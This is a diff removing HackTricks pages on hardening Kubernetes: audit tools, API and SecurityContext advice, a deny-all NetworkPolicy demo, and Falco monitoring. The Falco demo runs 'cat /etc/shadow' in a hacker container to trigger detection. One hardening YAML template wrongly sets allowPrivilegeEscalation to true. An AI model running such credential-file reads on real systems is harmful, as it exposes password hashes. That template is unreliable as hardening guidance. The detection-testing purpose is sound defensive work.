-* Check out [https://www.vaultproject.io/](https://www.vaultproject.io) for add more protection to your secrets. -* [https://kubernetes.io/docs/concepts/configuration/secret/#risks](https://kubernetes.io/docs/concepts/configuration/secret/#risks) -* [https://docs.cyberark.com/Product-Doc/OnlineHelp/AAM-DAP/11.2/en/Content/Integrations/Kubernetes\_deployApplicationsConjur-k8s-Secrets.htm](https://docs.cyberark.com/Product-Doc/OnlineHelp/AAM-DAP/11.2/en/Content/Integrations/Kubernetes\_deployApplicationsConjur-k8s-Secrets.htm) - -## References - -{% embed url="https://sickrov.github.io/" %} - -{% embed url="https://www.youtube.com/watch?v=X48VuDVv0do" %} - -
- -Support HackTricks and get benefits! - -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
diff --git a/pentesting/pentesting-kubernetes/kubernetes-hardening/README.md b/pentesting/pentesting-kubernetes/kubernetes-hardening/README.md deleted file mode 100644 index cbdc9e49b..000000000 --- a/pentesting/pentesting-kubernetes/kubernetes-hardening/README.md +++ /dev/null @@ -1,171 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# Tools - -## Kube-bench - -The tool [**kube-bench**](https://github.com/aquasecurity/kube-bench) is a tool that checks whether Kubernetes is deployed securely by running the checks documented in the [**CIS Kubernetes Benchmark**](https://www.cisecurity.org/benchmark/kubernetes/).\ -You can choose to: - -* run kube-bench from inside a container (sharing PID namespace with the host) -* run a container that installs kube-bench on the host, and then run kube-bench directly on the host -* install the latest binaries from the [Releases page](https://github.com/aquasecurity/kube-bench/releases), -* compile it from source. - -## Kubeaudit - -The tool [**kubeaudit**](https://github.com/Shopify/kubeaudit) is a command line tool and a Go package to **audit Kubernetes clusters** for various different security concerns. - -Kubeaudit can detect if it is running within a container in a cluster. If so, it will try to audit all Kubernetes resources in that cluster: - -``` -kubeaudit all -``` - -This tool also has the argument `autofix` to **automatically fix detected issues.** - -## **Popeye** - -[**Popeye**](https://github.com/derailed/popeye) is a utility that scans live Kubernetes cluster and **reports potential issues with deployed resources and configurations**. It sanitizes your cluster based on what's deployed and not what's sitting on disk. By scanning your cluster, it detects misconfigurations and helps you to ensure that best practices are in place, thus preventing future headaches. It aims at reducing the cognitive _over_load one faces when operating a Kubernetes cluster in the wild. Furthermore, if your cluster employs a metric-server, it reports potential resources over/under allocations and attempts to warn you should your cluster run out of capacity. 
 - -## **KICS** - -[**KICS**](https://github.com/Checkmarx/kics) finds **security vulnerabilities**, compliance issues, and infrastructure misconfigurations in the following **Infrastructure as Code solutions**: Terraform, Kubernetes, Docker, AWS CloudFormation, Ansible, Helm, Microsoft ARM, and OpenAPI 3.0 specifications - -## Checkov - -[**Checkov**](https://github.com/bridgecrewio/checkov) is a static code analysis tool for infrastructure-as-code. - -It scans cloud infrastructure provisioned using [Terraform](https://terraform.io), Terraform plan, [Cloudformation](https://aws.amazon.com/cloudformation/), [AWS SAM](https://aws.amazon.com/serverless/sam/), [Kubernetes](https://kubernetes.io), [Dockerfile](https://www.docker.com), [Serverless](https://www.serverless.com) or [ARM Templates](https://docs.microsoft.com/en-us/azure/azure-resource-manager/templates/overview) and detects security and compliance misconfigurations using graph-based scanning. - -## **Monitoring with Falco** - -{% content-ref url="monitoring-with-falco.md" %} -[monitoring-with-falco.md](monitoring-with-falco.md) -{% endcontent-ref %} - -# Tips - -## Kubernetes PodSecurityContext and SecurityContext - -You can configure the **security context of the Pods** (with _PodSecurityContext_) and of the **containers** that are going to be run (with _SecurityContext_). 
For more information read: - -{% content-ref url="kubernetes-securitycontext-s.md" %} -[kubernetes-securitycontext-s.md](kubernetes-securitycontext-s.md) -{% endcontent-ref %} - -## Kubernetes API Hardening - -It's very important to **protect the access to the Kubernetes Api Server** as a malicious actor with enough privileges could be able to abuse it and damage in a lot of way the environment.\ -It's important to secure both the **access** (**whitelist** origins to access the API Server and deny any other connection) and the [**authentication**](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/) (following the principle of **least** **privilege**). And definitely **never** **allow** **anonymous** **requests**. - -**Common Request process:**\ -User or K8s ServiceAccount –> Authentication –> Authorization –> Admission Control. - -**Tips**: - -* Close ports. -* Avoid Anonymous access. -* NodeRestriction; No access from specific nodes to the API. - * [https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#noderestriction](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#noderestriction) - * Basically prevents kubelets from adding/removing/updating labels with a node-restriction.kubernetes.io/ prefix. This label prefix is reserved for administrators to label their Node objects for workload isolation purposes, and kubelets will not be allowed to modify labels with that prefix. - * And also, allows kubelets to add/remove/update these labels and label prefixes. -* Ensure with labels the secure workload isolation. -* Avoid specific pods from API access. -* Avoid ApiServer exposure to the internet. -* Avoid unauthorized access RBAC. -* ApiServer port with firewall and IP whitelisting. - -## SecurityContext Hardening - -By default root user will be used when a Pod is started if no other user is specified. 
You can run your application inside a more secure context using a template similar to the following one: - -```yaml -apiVersion: v1 -kind: Pod -metadata: - name: security-context-demo -spec: - securityContext: - runAsUser: 1000 - runAsGroup: 3000 - fsGroup: 2000 - volumes: - - name: sec-ctx-vol - emptyDir: {} - containers: - - name: sec-ctx-demo - image: busybox - command: [ "sh", "-c", "sleep 1h" ] - securityContext: - runAsNonRoot: true - volumeMounts: - - name: sec-ctx-vol - mountPath: /data/demo - securityContext: - allowPrivilegeEscalation: true -``` - -* [https://kubernetes.io/docs/tasks/configure-pod-container/security-context/](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/) -* [https://kubernetes.io/docs/concepts/policy/pod-security-policy/](https://kubernetes.io/docs/concepts/policy/pod-security-policy/) - -## Kubernetes NetworkPolicies - -{% content-ref url="kubernetes-networkpolicies.md" %} -[kubernetes-networkpolicies.md](kubernetes-networkpolicies.md) -{% endcontent-ref %} - -## General Hardening - -You should update your Kubernetes environment as frequently as necessary to have: - -* Dependencies up to date. -* Bug and security patches. - -[**Release cycles**](https://kubernetes.io/docs/setup/release/version-skew-policy/): Each 3 months there is a new minor release -- 1.20.3 = 1(Major).20(Minor).3(patch) - -**The best way to update a Kubernetes Cluster is (from** [**here**](https://kubernetes.io/docs/tasks/administer-cluster/cluster-upgrade/)**):** - -* Upgrade the Master Node components following this sequence: - * etcd (all instances). - * kube-apiserver (all control plane hosts). - * kube-controller-manager. - * kube-scheduler. - * cloud controller manager, if you use one. -* Upgrade the Worker Node components such as kube-proxy, kubelet. - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md b/pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md deleted file mode 100644 index e4290c932..000000000 --- a/pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md +++ /dev/null @@ -1,158 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -**This tutorial was taken from** [**https://madhuakula.com/kubernetes-goat/scenarios/scenario-20.html**](https://madhuakula.com/kubernetes-goat/scenarios/scenario-20.html) - -## Scenario Information - -This scenario deploys a simple network security policy for Kubernetes resources to create security boundaries. - -* To get started with this scenario ensure you are using a networking solution which supports `NetworkPolicy` - -## Scenario Solution - -* The below scenario is from [https://github.com/ahmetb/kubernetes-network-policy-recipes](https://github.com/ahmetb/kubernetes-network-policy-recipes) - -If you want to control traffic flow at the IP address or port level (OSI layer 3 or 4), then you might consider using Kubernetes NetworkPolicies for particular applications in your cluster. NetworkPolicies are an application-centric construct which allow you to specify how a pod is allowed to communicate with various network "entities" (we use the word "entity" here to avoid overloading the more common terms such as "endpoints" and "services", which have specific Kubernetes connotations) over the network. - -The entities that a Pod can communicate with are identified through a combination of the following 3 identifiers: - -1. Other pods that are allowed (exception: a pod cannot block access to itself) Namespaces that are allowed -2. IP blocks (exception: traffic to and from the node where a Pod is running is always allowed, regardless of the IP address of the Pod or the node) -3. When defining a pod- or namespace- based NetworkPolicy, you use a selector to specify what traffic is allowed to and from the Pod(s) that match the selector. - -Meanwhile, when IP based NetworkPolicies are created, we define policies based on IP blocks (CIDR ranges). - -* We will be creating DENY all traffic to an application - -> This NetworkPolicy will drop all traffic to pods of an application, selected using Pod Selectors. 
- -Use Cases: - -* It’s very common: To start whitelisting the traffic using Network Policies, first you need to blacklist the traffic using this policy. -* You want to run a Pod and want to prevent any other Pods communicating with it. -* You temporarily want to isolate traffic to a Service from other Pods. - -![Scenario 20 NSP](https://madhuakula.com/kubernetes-goat/scenarios/images/sc-20-1.gif) - -### Example - -* Run a nginx Pod with labels `app=web` and expose it at port 80 - -```bash -kubectl run --image=nginx web --labels app=web --expose --port 80 -``` - -* Run a temporary Pod and make a request to `web` Service - -```bash -kubectl run --rm -i -t --image=alpine test-$RANDOM -- sh -``` - -```bash -wget -qO- http://web -# You will see the below output -# -# -# -# ... -``` - -* It works, now save the following manifest to `web-deny-all.yaml`, then apply to the cluster - -```yaml -kind: NetworkPolicy -apiVersion: networking.k8s.io/v1 -metadata: - name: web-deny-all -spec: - podSelector: - matchLabels: - app: web - ingress: [] -``` - -```bash -kubectl apply -f web-deny-all.yaml -``` - -### Try it out - -* Run a test container again, and try to query `web` - -```bash -kubectl run --rm -i -t --image=alpine test-$RANDOM -- sh -``` - -```bash -wget -qO- --timeout=2 http://web -# You will see the below output -# wget: download timed out -``` - -* Traffic dropped - -### [Remarks](https://madhuakula.com/kubernetes-goat/scenarios/scenario-20.html#remarks) - -* In the manifest above, we target Pods with app=web label to policy the network. This manifest file is missing the spec.ingress field. Therefore it is not allowing any traffic into the Pod. -* If you create another NetworkPolicy that gives some Pods access to this application directly or indirectly, this NetworkPolicy will be obsolete. -* If there is at least one NetworkPolicy with a rule allowing the traffic, it means the traffic will be routed to the pod regardless of the policies blocking the traffic. 
- -### Cleanup - -```bash -kubectl delete pod web -kubectl delete service web -kubectl delete networkpolicy web-deny-all -``` - -* More references and resources can be found at https://github.com/ahmetb/kubernetes-network-policy-recipes - -## Cilium Editor - Network Policy Editor - -A tool/framework to teach you how to create a network policy using the Editor. It explains basic network policy concepts and guides you through the steps needed to achieve the desired least-privilege security and zero-trust concepts. - -* **Navigate to the Cilium Editor** [**https://editor.cilium.io/**](https://editor.cilium.io) - -![Scenario 20 NSP Cilium](https://madhuakula.com/kubernetes-goat/scenarios/images/sc-20-2.png) - -## Miscellaneous - -* [https://kubernetes.io/docs/concepts/services-networking/network-policies/](https://kubernetes.io/docs/concepts/services-networking/network-policies/) -* [https://github.com/ahmetb/kubernetes-network-policy-recipes](https://github.com/ahmetb/kubernetes-network-policy-recipes) -* [https://editor.cilium.io/](https://editor.cilium.io) - - -</div>
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-securitycontext-s.md b/pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-securitycontext-s.md deleted file mode 100644 index dd7d6552d..000000000 --- a/pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-securitycontext-s.md +++ /dev/null @@ -1,86 +0,0 @@ -# Kubernetes SecurityContext(s) - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- -## PodSecurityContext - -When specifying the security context of a Pod you can use several attributes. From a defensive security point of view you should consider: - -* To have **runASNonRoot** as **True** -* To configure **runAsUser** -* If possible, consider **limiting** **permissions** indicating **seLinuxOptions** and **seccompProfile** -* Do **NOT** give **privilege** **group** access via **runAsGroup** and **supplementaryGroups** - -|

fsGroup
integer

|

A special supplemental group that applies to all containers in a pod. Some volume types allow the Kubelet to change the ownership of that volume to be owned by the pod:
1. The owning GID will be the FSGroup
2. The setgid bit is set (new files created in the volume will be owned by FSGroup)
3. The permission bits are OR'd with rw-rw----. If unset, the Kubelet will not modify the ownership and permissions of any volume</br>

| -| ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -|

fsGroupChangePolicy
string

| This defines behavior of **changing ownership and permission of the volume** before being exposed inside Pod. | -|

runAsGroup
integer

| The **GID to run the entrypoint of the container process**. Uses runtime default if unset. May also be set in SecurityContext. | -|

runAsNonRoot
boolean

| Indicates that the container must run as a non-root user. If true, the Kubelet will validate the image at runtime to ensure that it does not run as UID 0 (root) and fail to start the container if it does. | -|

runAsUser
integer

| The **UID to run the entrypoint of the container process**. Defaults to user specified in image metadata if unspecified. | -|

seLinuxOptions
SELinuxOptions
More info about seLinux

| The **SELinux context to be applied to all containers**. If unspecified, the container runtime will allocate a random SELinux context for each container. | -|

seccompProfile
SeccompProfile
More info about Seccomp

| The **seccomp options to use by the containers** in this pod. | -|

supplementalGroups
integer array

| A list of **groups applied to the first process run in each container**, in addition to the container's primary GID. | -|

sysctls
Sysctl array
More info about sysctls

| Sysctls hold a list of **namespaced sysctls used for the pod**. Pods with unsupported sysctls (by the container runtime) might fail to launch. | -|

windowsOptions
WindowsSecurityContextOptions

| The Windows specific settings applied to all containers. If unspecified, the options within a container's SecurityContext will be used. | - -## SecurityContext - -This context is set inside the **containers definitions**. From a defensive security point of view you should consider: - -* **allowPrivilegeEscalation** to **False** -* Do not add sensitive **capabilities** (and remove the ones you don't need) -* **privileged** to **False** -* If possible, set **readOnlyFilesystem** as **True** -* Set **runAsNonRoot** to **True** and set a **runAsUser** -* If possible, consider **limiting** **permissions** indicating **seLinuxOptions** and **seccompProfile** -* Do **NOT** give **privilege** **group** access via **runAsGroup.** - -Note that the attributes set in **both SecurityContext and PodSecurityContext**, the value specified in **SecurityContext** takes **precedence**. - -|

allowPrivilegeEscalation
boolean

| **AllowPrivilegeEscalation** controls whether a process can **gain more privileges** than its parent process. This bool directly controls if the no\_new\_privs flag will be set on the container process. AllowPrivilegeEscalation is true always when the container is run as **Privileged** or has **CAP\_SYS\_ADMIN** | -| ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -|

capabilities
Capabilities
More info about Capabilities

| The **capabilities to add/drop when running containers**. Defaults to the default set of capabilities. | -|

privileged
boolean

| Run container in privileged mode. Processes in privileged containers are essentially **equivalent to root on the host**. Defaults to false. | -|

procMount
string

| procMount denotes the **type of proc mount to use for the containers**. The default is DefaultProcMount which uses the container runtime defaults for readonly paths and masked paths. | -|

readOnlyRootFilesystem
boolean

| Whether this **container has a read-only root filesystem**. Default is false. | -|

runAsGroup
integer

| The **GID to run the entrypoint** of the container process. Uses runtime default if unset. | -|

runAsNonRoot
boolean

| Indicates that the container must **run as a non-root user**. If true, the Kubelet will validate the image at runtime to ensure that it does not run as UID 0 (root) and fail to start the container if it does. | -|

runAsUser
integer

| The **UID to run the entrypoint** of the container process. Defaults to user specified in image metadata if unspecified. | -|

seLinuxOptions
SELinuxOptions
More info about seLinux

| The **SELinux context to be applied to the container**. If unspecified, the container runtime will allocate a random SELinux context for each container. | -|

seccompProfile
SeccompProfile

| The **seccomp options** to use by this container. | -|

windowsOptions
WindowsSecurityContextOptions

| The **Windows specific settings** applied to all containers. | - -## References - -* [https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#podsecuritycontext-v1-core](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#podsecuritycontext-v1-core) -* [https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#securitycontext-v1-core](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#securitycontext-v1-core) - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
diff --git a/pentesting/pentesting-kubernetes/kubernetes-hardening/monitoring-with-falco.md b/pentesting/pentesting-kubernetes/kubernetes-hardening/monitoring-with-falco.md deleted file mode 100644 index d052640b2..000000000 --- a/pentesting/pentesting-kubernetes/kubernetes-hardening/monitoring-with-falco.md +++ /dev/null @@ -1,107 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -This tutorial was taken from [https://madhuakula.com/kubernetes-goat/scenarios/scenario-18.html#scenario-information](https://madhuakula.com/kubernetes-goat/scenarios/scenario-18.html#scenario-information) - -## Scenario Information - -This scenario deploys runtime security monitoring & detection for containers and Kubernetes resources. - -* To get started with this scenario you can deploy the below helm chart with version 3 - -> NOTE: Make sure you run the following deployment using Helm with v3. - -```bash -helm repo add falcosecurity https://falcosecurity.github.io/charts -helm repo update -helm install falco falcosecurity/falco -``` - -![Scenario 18 helm falco setup](https://madhuakula.com/kubernetes-goat/scenarios/images/sc-18-1.png) - -## [Scenario Solution](https://madhuakula.com/kubernetes-goat/scenarios/scenario-18.html#scenario-solution) - -> `Falco`, the cloud-native runtime security project, is the de facto Kubernetes threat detection engine. Falco was created by Sysdig in 2016 and is the first runtime security project to join CNCF as an incubation-level project. Falco detects unexpected application behavior and alerts on threats at runtime. 
- -Falco uses system calls to secure and monitor a system, by: - -* Parsing the Linux system calls from the kernel at runtime -* Asserting the stream against a powerful rules engine -* Alerting when a rule is violated - -Falco ships with a default set of rules that check the kernel for unusual behavior such as: - -* Privilege escalation using privileged containers -* Namespace changes using tools like `setns` -* Read/Writes to well-known directories such as /etc, /usr/bin, /usr/sbin, etc -* Creating symlinks -* Ownership and Mode changes -* Unexpected network connections or socket mutations -* Spawned processes using execve -* Executing shell binaries such as sh, bash, csh, zsh, etc -* Executing SSH binaries such as ssh, scp, sftp, etc -* Mutating Linux coreutils executables -* Mutating login binaries -* Mutating shadowutil or passwd executables such as shadowconfig, pwck, chpasswd, getpasswd, change, useradd, etc, and others. -* Get more details about the falco deployment - -```bash -kubectl get pods --selector app=falco -``` - -![Scenario 18 falco get pods](https://madhuakula.com/kubernetes-goat/scenarios/images/sc-18-2.png) - -* Manually obtaining the logs from the falco systems - -```bash -kubectl logs -f -l app=falco -``` - -* Now, let's spin up a hacker container and read a sensitive file and see if it is detected by Falco - -```bash -kubectl run --rm --restart=Never -it --image=madhuakula/hacker-container -- bash -``` - -* Read the sensitive file - -```bash -cat /etc/shadow -``` - -![Scenario 18 falco detect /etc/shadow](https://madhuakula.com/kubernetes-goat/scenarios/images/sc-18-3.png) - - -</div>
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/pentesting/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md b/pentesting/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md deleted file mode 100644 index d2d8dc394..000000000 --- a/pentesting/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md +++ /dev/null @@ -1,206 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# Role-Based Access Control (RBAC) - -Kubernetes has an **authorization module named Role-Based Access Control** ([**RBAC**](https://kubernetes.io/docs/reference/access-authn-authz/rbac/)) that helps to set utilization permissions to the API server. - -RBAC’s permission model is built from **three individual parts**: - -1. **Role\ClusterRole ­–** The actual permission. It contains _**rules**_ that represent a set of permissions. Each rule contains [resources](https://kubernetes.io/docs/reference/kubectl/overview/#resource-types) and [verbs](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#determine-the-request-verb). The verb is the action that will apply on the resource. -2. **Subject (User, Group or ServiceAccount) –** The object that will receive the permissions. -3. **RoleBinding\ClusterRoleBinding –** The connection between Role\ClusterRole and the subject. - -![](https://www.cyberark.com/wp-content/uploads/2018/12/rolebiding\_serviceaccount\_and\_role-1024x551.png) - -The difference between β€œ**Roles**” and β€œ**ClusterRoles**” is just where the role will be applied – a β€œ**Role**” will grant access to only **one** **specific** **namespace**, while a β€œ**ClusterRole**” can be used in **all namespaces** in the cluster. Moreover, **ClusterRoles** can also grant access to: - -* **cluster-scoped** resources (like nodes). -* **non-resource** endpoints (like /healthz). -* namespaced resources (like Pods), **across all namespaces**. - -From **Kubernetes** 1.6 onwards, **RBAC** policies are **enabled by default**. 
